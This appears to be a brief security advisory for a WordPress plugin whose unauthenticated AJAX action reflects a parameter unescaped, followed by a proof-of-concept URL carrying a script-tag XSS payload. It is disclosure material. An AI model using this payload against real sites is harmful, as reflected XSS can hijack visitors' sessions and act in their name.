The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting

### PoC

https://example.com/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk;=%3Cscript%3Ealert(`xss`)%3C/script%3E Note: PHP must be configured with –enable-soap as the plugin appears to import ‘SoapClient’, which when not found produces an error while installing the plugin.Read More